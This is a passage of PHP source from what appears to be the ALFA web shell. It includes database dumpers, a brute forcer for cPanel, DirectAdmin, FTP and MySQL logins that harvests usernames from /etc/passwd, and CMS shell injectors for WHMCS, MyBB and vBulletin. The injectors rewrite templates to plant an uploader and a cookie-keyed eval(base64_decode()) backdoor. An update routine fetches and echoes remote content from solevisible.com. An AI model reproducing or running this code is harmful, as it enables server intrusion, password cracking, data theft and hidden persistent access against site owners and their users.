2567}
2568function alfacoldumper(){
2569alfahead();
2570echo('<div class="header">');
2571AlfaNum(8,9,10);
2572echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
2573$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
2574$selected_data = json_decode($_POST['alfa2'], true);
2575$username = ($_POST['alfa3']);
2576$password = ($_POST['alfa4']);
2577$dbname = ($_POST['alfa5']);
2578$dfile = ($_POST['alfa6']);
2579$host = ($_POST['alfa7']);
2580$table = array('td1' =>
2581 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
2582 'td2' =>
2583 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
2584 'td3' =>
2585 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
2586 'td4' =>
2587 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
2588 'td5' =>
2589 array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
2590);
2591create_table($table);
2592echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2593$db = false;
2594if(!empty($dbname)){
2595 $db = @mysqli_connect($host, $username, $password, $dbname);
2596}
2597if(count($selected_data) > 0){
2598 if($db){
2599 if(!is_dir($dfile)){
2600 $dfile = $GLOBALS['cwd'];
2601 }
2602 $tbls = "";
2603 $ext = '.txt';
2604 if($delimiter == 'json'){
2605 $ext = '.json';
2606 }
2607 foreach ($selected_data as $tbl => $cols) {
2608 $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
2609 $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
2610 $fp = fopen($file_name, "w");
2611 $data = array();
2612 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
2613 if($delimiter == "json"){
2614 $col_arr = array();
2615 foreach ($row as $key => $value) {
2616 if(empty($value)){
2617 $value = "[empty]";
2618 }
2619 $col_arr[$key] = $value;
2620 }
2621 $data[$tbl][] = $col_arr;
2622 }else{
2623 $data = "";
2624 foreach ($row as $key => $value) {
2625 if(empty($value)){
2626 $value = "[empty]";
2627 }
2628 $data .= $value . $delimiter;
2629 }
2630 fwrite($fp, $data ."\n");
2631 }
2632 }
2633 if($delimiter == "json"){
2634 fwrite($fp, json_encode($data));
2635 }
2636 fclose($fp);
2637 $tbls .= "Done ~~~> ".$file_name."<br>";
2638 }
2639 echo __pre();
2640 echo "<center><font color='#00FF00'>".$tbls."</font></center>";
2641 }
2642}
2643if(!empty($dbname) && count($selected_data) == 0){
2644//echo __pre();
2645if($db){
2646 echo("<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>");
2647 echo("<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>");
2648 $data = array();
2649 $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
2650 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
2651 $data[$row["table_name"]] = array();
2652 $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
2653 $table_count = mysqli_fetch_row($table_count_q);
2654 $data[$row["table_name"]]["data_count"] = $table_count[0];
2655 $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
2656 while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
2657 $data[$row["table_name"]]["cols"][] = $row2["column_name"];
2658 }
2659 }
2660 mysqli_close($db);
2661
2662 echo '<ul id="myUL">';
2663 foreach($data as $tbl => $cols){
2664 echo '<li><span style="color:#00FF00;" class="box">'.$tbl.' ('.$cols["data_count"].')</span><ul class="nested">';
2665 foreach($cols["cols"] as $col){
2666 echo '<li tbl="'.$tbl.'"><span style="color:#00FF00;" tbl="'.$tbl.'" class="box sub-box">' . $col . '</span></li>';
2667 }
2668 echo '</ul></li>';
2669 }
2670 echo '</ul>';
2671}else{
2672echo('<center>mysqli_connect : Error!</center>');
2673}
2674}
2675echo('</div>');
2676alfafooter();
2677}
2678function alfaDumper(){
2679alfahead();
2680echo('<div class="header">');
2681AlfaNum(8,9,10);
2682echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
2683$table = array('td1' =>
2684 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2685 'td2' =>
2686 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2687 'td3' =>
2688 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2689 'td4' =>
2690 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2691 'td5' =>
2692 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
2693);
2694create_table($table);
2695echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2696$username = ($_POST['alfa3']);
2697$password = ($_POST['alfa4']);
2698$dbname = ($_POST['alfa5']);
2699$dfile = ($_POST['alfa6']);
2700$host = ($_POST['alfa7']);
2701if(!empty($dbname)){
2702echo __pre();
2703$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
2704if(@mysqli_connect($host,$username,$password,$dbname)){
2705if(strlen(alfaEx("mysqldump"))>0){
2706alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
2707echo($msg);
2708}else{
2709__alert("Error...!");
2710}
2711}else{
2712echo('<center>mysqli_connect : Error!</center>');
2713}
2714}
2715echo('</div>');
2716alfafooter();
2717}
2718function Alfa_DirectAdmin_Cracker($info){
2719if(!$info['mysql'])
2720$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
2721else $url = $info['protocol'].$info['target'].'/phpmyadmin';
2722$curl = curl_init();
2723curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2724curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2725curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2726curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2727curl_setopt($curl, CURLOPT_HEADER,0);
2728curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2729curl_setopt($curl, CURLOPT_URL,$url);
2730curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
2731if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
2732$result = @curl_exec($curl);
2733$curl_errno = curl_errno($curl);
2734$curl_error = curl_error($curl);
2735if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2736elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
2737echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2738$info['target'] = $url;
2739CrackerResualt($info);
2740}
2741curl_close($curl);
2742}
2743function Alfa_CP_Cracker($info){
2744$url = $info['protocol'].$info['target'].':'.$info['port'];
2745$curl = curl_init();
2746curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2747curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2748curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2749curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2750curl_setopt($curl, CURLOPT_HEADER,0);
2751curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
2752curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
2753curl_setopt($curl, CURLOPT_URL, $url);
2754$result = @curl_exec($curl);
2755$curl_errno = curl_errno($curl);
2756$curl_error = curl_error($curl);
2757if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2758elseif(preg_match('/filemanager/i',$result)){
2759echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2760$info['target'] = $url;
2761CrackerResualt($info);
2762}
2763curl_close($curl);
2764}
2765function Alfa_FTP_Cracker($info){
2766$url = $info['protocol'].$info['target'];
2767$curl = curl_init();
2768curl_setopt($curl, CURLOPT_URL, $url);
2769curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2770curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2771curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
2772$result = @curl_exec($curl);
2773$curl_errno = curl_errno($curl);
2774$curl_error = curl_error($curl);
2775if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2776elseif(preg_match('/(\d+):(\d+)/i',$result)){
2777echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2778$info['target'] = $url;
2779CrackerResualt($info);
2780}
2781curl_close($curl);
2782}
2783function Alfa_Mysql_Cracker($info){
2784if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
2785CrackerResualt($info);
2786echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2787}
2788}
2789function Alfa_FTPC($info){
2790if($con=@ftp_connect($info['target'],$info['port'])){
2791if($con){
2792$login=@ftp_login($con,$info['username'],$info['password']);
2793if($login){CrackerResualt($info);}}}
2794@ftp_close($con);
2795}
2796function CrackerResualt($info){
2797$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
2798$c = @fopen($info['fcrack'],'a+');
2799@fwrite($c, $res);
2800@fclose($c);
2801}
2802function Alfa_Call_Function_Cracker($method,$info){
2803switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
2804}
2805function alfaCrackers(){
2806alfahead();
2807AlfaNum(9,10);
2808echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
2809foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
2810echo '</select> Protocol: <select id="protocol" name="protocol">';
2811foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
2812echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
2813Port: <input id="port" type="text" name="port" value="2083">
2814<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
2815<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
2816  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
2817Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
2818<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
2819$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
2820$port = $_POST['alfa2'];
2821$usernames= $_POST['alfa3'];
2822$passwords = $_POST['alfa4'];
2823$fcrack = $_POST['alfa5'];
2824$cracking = $_POST['alfa6'];
2825$protocol = $_POST['alfa7'];
2826$loginpanel = $_POST['alfa8'];
2827$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
2828if($cracking=='start'){
2829echo __pre();
2830$exuser = explode("\n",$usernames);
2831$expw = explode("\n",$passwords);
2832foreach($exuser as $user){
2833foreach($expw as $pw){
2834$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
2835Alfa_Call_Function_Cracker($loginpanel,$array);
2836}
2837}
2838echo '<br><font color="red">Attack Finished...</font>';
2839}
2840echo '</div>';
2841alfafooter();
2842}
2843function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
2844function alfaShellInjectors(){
2845alfahead();
2846echo '<div class=header>';
2847AlfaNum(11);
2848echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
2849$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
2850if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
2851AlfaNum();
2852echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
2853$table = array('td1' =>
2854 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
2855 'td2' =>
2856 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2857 'td3' =>
2858 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2859 'td4' =>
2860 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2861 'td5' =>
2862 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
2863);
2864create_table($table);
2865echo $selector;
2866echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
2867if(isset($_POST['alfa6'])) {
2868$dbu = $_POST['alfa6'];
2869$dbn = $_POST['alfa7'];
2870$dbp = $_POST['alfa8'];
2871$dbh = $_POST['alfa9'];
2872$path = $_POST['alfa10'];
2873$method = $_POST['alfa4'];
2874$index = "{php}".ALFA_UPLOADER.";{/php}";
2875$newin = str_replace("'","\'",$index);
2876$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2877if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
2878if(filter_var($path,FILTER_VALIDATE_URL)){
2879$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
2880$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
2881$soleGet = mysqli_fetch_assoc($soleSave);
2882$tempSave1 = $soleGet['message'];
2883$tempSave = str_replace("'","\'",$tempSave1);
2884mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
2885$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
2886$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
2887$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2888$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
2889if(function_exists('curl_version') && $method == 'auto'){
2890$AlfaSole = new AlfaCURL(true);
2891$saveurl = $AlfaSole->Send($path."/pwreset.php");
2892$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
2893$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2894$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2895$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
2896__alert("shell injectet...");
2897$ff= 'http://'.$path."/solevisible.php";
2898output($ff);}else{
2899echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
2900}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
2901AlfaNum(1,2,3,5);
2902echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
2903";
2904$table = array('td1' =>
2905 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2906 'td2' =>
2907 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
2908 'td3' =>
2909 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
2910 'td4' =>
2911 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2912 'td5' =>
2913 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
2914);
2915create_table($table);
2916echo $selector;
2917echo "<p><input type=submit value=' '></p></form></center></center>";
2918if(isset($_POST['alfa6'])) {
2919$dbu = $_POST['alfa6'];
2920$dbn = $_POST['alfa7'];
2921$dbp = $_POST['alfa8'];
2922$dbh = $_POST['alfa9'];
2923$prefix = $_POST['alfa10'];
2924$method = $_POST['alfa4'];
2925$shellCode = "{\${".ALFA_UPLOADER."}}";
2926$newinshell = str_replace("'","\'",$shellCode);
2927if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
2928$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2929$inject = "select template from {$prefix}templates where title= 'calendar'";
2930$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
2931$GetTemp = mysqli_fetch_assoc($result);
2932$saveDate = $GetTemp['template'];
2933$repsave = str_replace($shellCode,"",$saveDate);
2934$repsave = str_replace("'","\'",$repsave);
2935$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
2936$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
2937$geturl = "select value from {$prefix}settings where name= 'bburl'";
2938$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
2939$rowb = mysqli_fetch_assoc($findurl);
2940$furl = $rowb['value'];
2941$realurl = parse_url($furl,PHP_URL_HOST);
2942$realpath = parse_url($furl,PHP_URL_PATH);
2943$res = false;
2944$AlfaCurl = new AlfaCURL();
2945if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
2946if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2947@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
2948@fputs($fsock, "HOST: $realurl\r\n");
2949@fputs($fsock, "Connection: close\r\n\r\n");
2950$check = fgets($fsock);
2951if(preg_match("/200 OK/i",$check)){
2952$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
2953$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
2954@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
2955$AlfaCurl->Send($realurl.$realpath."/calendar.php");
2956$res = true;
2957}
2958if($res){
2959$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2960output($ff);
2961}else{
2962$ff = 'http://'.$realurl.$realpath."/calendar.php";
2963$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2964echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
2965}}}}
2966if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
2967AlfaNum(1,2,7,9,10);
2968echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
2969$table = array('td1' =>
2970 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2971 'td2' =>
2972 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
2973 'td3' =>
2974 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
2975 'td4' =>
2976 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
2977 'td5' =>
2978 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
2979);
2980create_table($table);
2981echo $selector;
2982echo '<p><input type="submit" value=" " /></p></form></center>';
2983if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
2984$method = $_POST['alfa8'];
2985$faq_name = "faq";
2986$faq_file = "/faq.php";
2987$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
2988$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
2989$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
2990$recivedata = @mysqli_query($conn,$rec);
2991$getd = @mysqli_fetch_assoc($recivedata);
2992$savetoass = $getd['template'];
2993if(empty($savetoass)){
2994 $faq_name = "header";
2995 $faq_file = "/";
2996 $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
2997 $recivedata = @mysqli_query($conn,$rec);
2998 $getd = @mysqli_fetch_assoc($recivedata);
2999 $savetoass = $getd['template'];
3000 $code = ALFA_UPLOADER.";";
3001}
3002$code = str_replace("'","\'",$code);
3003$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
3004$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
3005$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
3006$getval = @mysqli_fetch_assoc($geturl);
3007$saveval = $getval['value'];
3008if($faq_name == "header"){
3009 if(substr($saveval, -5, 5) == "/core"){
3010 $saveval = substr($saveval, 0, -5);
3011 }
3012}
3013$realurl = parse_url($saveval,PHP_URL_HOST);
3014$realpath = parse_url($saveval,PHP_URL_PATH);
3015$res = false;
3016$AlfaCurl = new AlfaCURL();
3017if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
3018if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
3019@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
3020@fputs($fsock, "HOST: $realurl\r\n");
3021@fputs($fsock, "Connection: close\r\n\r\n");
3022$check = fgets($fsock);
3023if(preg_match("/200 OK/i",$check)){
3024$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
3025$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
3026$res = true;
3027}
3028@fclose($fsock);
3029}
3030}elseif(function_exists('curl_version') && $method == 'auto'){
3031$AlfaCurl->Send($realurl.$realpath.$faq_file);
3032$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
3033$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
3034$res = true;
3035}
3036if($res){
3037$ff = 'http://'.$realurl.$realpath."/solevisible.php";
3038output($ff);
3039}else{
3040$ff = 'http://'.$realurl.$realpath.$faq_file;
3041$fff = 'http://'.$realurl.$realpath."/solevisible.php";
3042echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
3043echo '</div>';
3044alfafooter();
3045}
3046function alfacheckfiletype(){
3047 $path = $_POST['path'];
3048 $arg = $_POST['arg'];
3049 if(@is_file($path.'/'.$arg)){
3050 echo("file");
3051 }else{
3052 echo("dir");
3053 }
3054}
3055function alfacheckupdate(){
3056 if($GLOBALS["DB_NAME"]["cgi_api"]){
3057 if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){
3058 _alfa_cgicmd("whoami","perl",true);
3059 if(strlen(alfaEx("whoami",false,$cgi))>0){
3060 __alfa_set_cookie("alfa_canruncmd", "true");
3061 }
3062 }
3063 }
3064 if(!isset($_COOKIE['alfa_checkupdate'])){
3065 if(function_exists("curl_version")){
3066 $update = new AlfaCURL();
3067 $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
3068 $json = @json_decode($json,true);
3069 if($json){
3070 if(!empty($json["type"])){
3071 if($json["type"] == "update"){
3072 if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){
3073 @setcookie("alfa_checkupdate", "1", time()+86400);
3074 echo('<div class="update-holder">'.$json["content"].'</div>');
3075 }
3076 }else{
3077 echo $json["content"];
3078 }
3079 }
3080 }
3081 }
3082 }
3083}
3084function alfaWriteTocgiapi($name, $source){
3085 $temp = "";
3086 $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
3087 if(in_array($name, $not_api)){
3088 $temp = ALFA_TEMPDIR;
3089 if($temp){
3090 @chdir($temp);
3091 }
3092 }else{
3093 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3094 }
3095 @mkdir('alfacgiapi',0755);
3096 __write_file("alfacgiapi/".$name, __get_resource($source));
